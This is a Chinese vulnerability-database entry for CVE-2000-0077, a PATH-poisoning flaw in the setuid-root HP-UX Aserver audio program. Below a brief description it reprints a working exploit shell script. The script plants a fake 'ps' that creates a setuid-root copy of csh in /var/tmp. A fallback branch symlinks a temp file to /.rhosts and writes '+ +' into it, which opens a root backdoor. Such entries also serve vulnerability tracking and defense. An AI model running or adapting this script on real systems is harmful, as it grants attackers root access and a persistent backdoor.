HP-UX Aserver PATH漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105380 漏洞类型 未知
发布时间 1998-10-18 更新时间 2009-03-04
CVE编号 CVE-2000-0077 CNNVD-ID CNNVD-200001-005
漏洞平台 HP-UX CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20396
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200001-005
|漏洞详情
1998十月版本的HP-UXaserver程序存在漏洞。本地用户可以通过指定一个备用PATH来提升特权,aserver用该PATH寻找aps和grep命令。
|漏洞EXP
# source: http://www.securityfocus.com/bid/1929/info
#
# Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default. 
#
# During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root. 
# 
# This is a trivial root compromise.
#

#!/bin/sh
#
# HP-UX aserver.sh - Loneguard 18/10/98
# Simple no brainer path poison followed by a twist [ inspired by DC ;) ]
#
cd /var/tmp
cat < _EOF > ps
#!/bin/sh
cp /bin/csh /var/tmp/.foosh
chmod 4755 /var/tmp/.foosh
_EOF
chmod 755 ps
PATH=.:$PATH
/opt/audio/bin/Aserver -f
if [ -e /var/tmp/.foosh ]
        # Hmmm, you not like that technique?
        cd /tmp
        rm last_uuid
        ln -s /.rhosts last_uuid
        /opt/audio/bin/Aserver -f
        echo "+ +" > /.rhosts
        # Haha, my Kungfu is the best!
fi
echo Crazy MONKEY!
|参考资料

来源:OVAL
名称:oval:org.mitre.oval:def:5549
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:5549